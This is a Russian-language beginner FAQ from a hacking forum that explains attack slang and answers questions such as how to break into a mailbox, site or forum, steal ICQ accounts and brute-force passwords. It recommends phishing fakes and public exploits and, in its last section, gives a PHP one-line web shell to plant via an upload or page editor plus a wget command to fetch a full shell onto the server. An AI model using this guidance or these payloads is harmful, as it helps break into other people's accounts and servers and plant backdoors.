F.A.Q: Что надо знать новичку ? - Forum.HackZona.Ru

 Термины и сленг компьютерного мира

:: Общие понятия ::

Hacker, хакер, хеккер, хек - человек, занимающийся всем тем, что здесь описано. Подробнее см. выше.

Lamer, ламер, ламерок, лам, ламо - человек, противоположный хакеру. Чаще всего является жертвой взломщиков.

Server, сервер - объект атаки хакеров. Чаще всего располагает на себе множество сайтов. Такой сервер будет у хостеров.

Bud, баг, уязвимость - недокументированная возможность, дающая возможность хакеру получить при определенных условиях доступ на сервере, последующее поднятие прав.

Botnet, ботнет - сеть компьютеров-жертв под управлением хакера. Чаще всего протроянизированные (см. ниже троян). Используется для DDoS'а серверов (см. ниже DDoS, DoS).

Google, гугл, гугль - это поисковая система, лучший друг и напарник хакера. Самое большое количество уязвимостей находится именно через него. Его можно найти по адресу http://www.google.ru/

Bruteforce, брутфорс, брут - метод атаки, заключающийся в полном переборе паролей на определенный сервис. Переводится как грубая сила. Различается на брут по словарю и брут прямым перебором.

Fake, фейк, фака - метод атаки из разновидности социальной инженерии (СИ, смотрите ниже), подразумевает обман пользователя путем создания точь в точь похожего ресурса на манер субъекта преступления, т.е., например, создание фейкового mail.ru сервера, где если пользователь введет свои входные данные, они буду перенаправлены фишеру.

Phishing, фишинг, фишер - метод атаки и человек, см. выше о фейке (аналог).

:: Уязвимости ::

SQL Injection, sql инъекция, скуля - это уязвимость, позволяющая удаленному пользователю составлять запросы к базе данных сервера. Различаются типы SQL инъекций по базам данных: Oracle, MySQL, PostgreSQL, MSSQL, etc. Самые частые из них это MySQL, MSSQL, PostgreSQL injections. Подробнее о простейших MySQL инъекциях http://hackzona.ru/hz.php?name=Forum...wtopic&t=22643 и http://www.hackzona.ru/hz.php?name=N...ticle&sid=8913 и об остальных инъекциях http://www.hackzona.ru/hz.php?name=F...wtopic&t=24623.

XSS, межсайтовый скриптинг, ксс, ксска - это уязвимость, которая позволяет взаймодействовать с браузером пользователя. Разделяется на активную и пассивную. При активной XSS хакер может не взаймодействовать с пользователем напрямую, эксплойт (см. далее что это такое) загружается на сервер, что исключает подозрения со сторону жертвы. Пассивная, соответственно, имеет более 'палевный' эффект. Подробнее о XSS для новичков http://hackzona.ru/hz.php?name=News&...ticle&sid=4991 и о методах обхода фильтрации при XSS http://www.hackzona.ru/hz.php?name=N...ticle&sid=9083.

Include bug, инклуд, инклюд - это уязвимость, позвляющая управлять файловой системой сервера. Различается на удаленную и локальную. При удаленной есть возможность подключить веб шелл (см. ниже что это такое), а при локальной только лишь возможность просмотра файлов. Подробнее о PHP инъекциях... http://hackzona.ru/hz.php?name=Forum...wtopic&t=24350

DoS, дос - метод атаки (Denial of Service), позволяющий 'положить' сервер. Используется только в крайних случаях. Зачастую требует больших вычислительных ресурсов.

DDoS, ддос - метод атаки (Distributed Denial of Service), позволяющий распределить количество ресурсов для атаки на сервер. См. выше DoS. Используется чаще всего при ботнете (см. выше подробнее о ботнете).

СИ, социальная инженерия - метод атаки на самое уязвимое звено системы - человека. Подробнее о нем можно почитать в книге The Art Of Deception гуру СИ Кевина Митника.

:: Программы ::

Exploit, sploit, сплоит, эксплоит - программа, позволяющая автоматизировать процесс эксплуатирования уязвимости. Различаются на удаленный и локальный, в зависимости от типа уязвимости. Локальные следует загружать на сервер, удаленные можно запускать с собственной машины. Подробнее об эксплоитах на примере форума http://www.hackzona.ru/hz.php?name=N...ticle&sid=8901, http://www.hackzona.ru/hz.php?name=N...ticle&sid=7342.

Shell, шелл, оболочка - это программа, позволяющая управлять удаленно взломанным сервером. Различаются веб шеллы (web shells), биндшеллы (bindshells), бэкдоры (backdoors) и другие. По порядку. Веб шелл - это программа, написанная на языке веб программирования (PHP, Perl, ASP, etc), позволяющая управлять сервером через браузер. Биндшелл - это программа, занимающая порт на сервере (подробнее о портах ниже) и позволяющая работать через него. Бэкдор - это аналог биндшелла, или программа, при определенных условиях дающая права администратора (root), иногда называют руткитами (rootkits).

Malware, вирус, троян - распространенная категория вредоносных программ, позволяющих получить доступ на сервер. Вирусы зачастую используют какие то уязвимости, эксплуатируют их, а затем подгружают трояна. Троян - тип вируса, позволяющий получить управление сервером, зачастую отсылает конфиденциальную информацию взломщику.

сниффер - программа, отслеживающая сетевой траффик. Используется для получения конфиденциальной информации, для определения различных свойств сети.

Bruteforcer, брутфорсер, брутер - программа, перебирающая пароли к сервису. См. выше Bruteforce.

скрипт - набор команд, программа. Используются для веба. Пишутся на различных языках, например на PHP, Perl, ASP, python, etc.

Итак, немного разобрались с терминами (они будут постоянно дополняться), теперь вереходим к F.A.Q.'у по веб хакингу...

[ F.A.Q. ]

Рассмотрим следующие часто задаваемые вопросы:


- Как взломать ящик?
- Как взломать сайт?
- Как взломать форум?
- Что такое сплоит?
- Как использовать сплоит?
- Как угнать аську?
- Как найти SQL inj и проэксплуатировать ее?
- Как найти XSS и проэксплуатировать ее?
- Как найти Inlude и проэксплуатировать его?
- Как сбрутить что-то?
- Как залить шелл?


Как взломать ящик?

Ну для начала смотрим на каком сервере расположена данная услуга (почтовик а не взлом). Если это крупный сервер, типа mail.ru & yandex.ru, то здесь лучше брутить. Для брута существуют специальные программы, которые вы можете найти в разделе новичков http://hackzona.ru/hz.php?name=Forum...wtopic&t=28078. Просто все уязвимости этих серверов лежат в основном в привате и достать их обычному человеку достаточно тяжело. Если же сервер не частоиспользуемый, то можно попытаться найти баги самому. Одна из часто используемых багов - это XSS (см. выше о ней), информацию о ней можно найти ниже по факу. Также возможно использовать атаку типа фейк, или же просто сбрутить ящик.

Как взломать сайт?

Что подразумевается под взломом сайта? Это перехват управления, т.е. админки или фтп доступа. Все это делается с помощью уязвимостей в системе. Их несколько типов: основные ошибки в скриптах (SQL injection, XSS, Include bug, подробнее о них см. в факе), ошибки серверного обеспечения (сетевые программы, например веб сервер, фтп сервер и иже с ними), человеческий фактор. Подробнее об основных ошибках в скриптах было описано выше, эксплуатировать же серверные уязвимости сложнее. Его для незнающих можно эксплуатировать сплоитами. О человеческом факторе говорит книга Кевина Митника. .

Как взломать форум?

Для начала определимся, какой версии форум. Если это публичный движок, то идем на любой сайт с багтраком http://milw0rm.ru или http://bugtrack.ru/ ищем версию форума. При удачном раскладе мы найдем сплоит. Что это аткое и как его есть рассказано ниже. Если же движок самописный или нераспространенный, то ищем баги сами.

Что такое сплоит?

Что такое сплоит, см. в разделе 'ВиХ'. Про его использование см. там же. http://www.hackzona.ru/hz.php?name=N...ticle&sid=7342

Как угнать аську?

О методах угона уинов можно говорить бесконечно долго. Подробнее... http://www.hackzona.ru/hz.php?name=N...ticle&sid=4627
Как найти SQL inj и проэксплуатировать ее?

Что такое SQL Injection, см. выше, также ссылки на статьи о методах ее эксплуатации см. выше.

Как найти XSS и проэксплуатировать ее?

Что такое XSS, см. выше, также ссылки на статьи о методах эксплуатации см. выше.

Как найти Inlude и проэксплуатировать его?

Что такое Include bug, см. выше.

Как сбрутить что-то?

Мы говорили о брутфорсе как о методе, позволяющем при имении больших ресурсов добиться больших успехов. Брутить можно все что угодно, от аси до мыла, но есть также еще и хеши (см. выше что это). Подробнее статью о них можно прочитать, а также сбрутить неподдающийся вам хеш можно здесь http://hackzona.ru/hz.php?name=Forum...wtopic&t=23212, о тактике расшифрования читаем тут http://www.hackzona.ru/hz.php?name=F...wtopic&t=18985.

Как залить шелл?

Залитие шелла - последний этап во внешнем аудите сайта, по сути его результат. Залить шелл можно разными путями, самый легкий - админка с функцией аплоада. В других случаях придется искать любой форум, в них через функцию заливки разных файлов, например смайлов, можно залить и скрипт. На крайний случай ищем, допустим, редактор страниц или новостей. Вставляем, наприме PHP код (все зависит от используемого интерпретатора), например:
Код:

<?php system($_GET['cmd']);?>;


который сделает мини-шелл, через него заливаем полноценный шелл:
Код:

wget -O /usr/loca/apache/htdocs/shell.php

это при использовании wget'а, также можно самому написать простейший аналог вгета, либо использовать аналог вгета.

:: Данный FAQ будет пополняться со временем ::

P.S Тестируем ссылки и добавлаем новые..."